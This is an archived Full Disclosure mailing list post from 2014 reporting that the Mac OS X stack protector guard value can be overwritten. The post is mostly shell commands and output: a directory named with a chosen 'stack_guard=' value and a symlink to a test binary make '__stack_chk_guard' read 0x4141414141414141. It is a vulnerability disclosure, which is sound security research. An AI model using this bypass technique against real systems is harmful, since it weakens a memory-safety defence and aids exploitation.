lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <161448728bb5305a312f7067e4ab2e86@openmailbox.org>
Date: Thu, 15 May 2014 13:53:32 +0000
From: rai@...nmailbox.org
To: fulldisclosure@...lists.org
Subject: [FD] Mac OS X stack_chk_guard not always safe from overwrite

 

Hi,

$ sysctl kern.version
kern.version: Darwin Kernel Version 13.1.0: Wed Apr 2 23:52:02 PDT 2014;
root:xnu-2422.92.1~2/RELEASE_X86_64

$ mkdir stack_guard=0x4141414141414141
$ ln -sf ../appledump stack_guard=0x4141414141414141/link
$ stack_guard=0x4141414141414141/link
string(0):
string(1):
string(2): stack_guard=0x7600c0a70d1184c5
string(3):

__stack_chk_guard: 4141414141414141

</bash>

source: http://maker.fea.st/appledump.c

All credit due to the anon pastebin poster.

--
rai

 

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ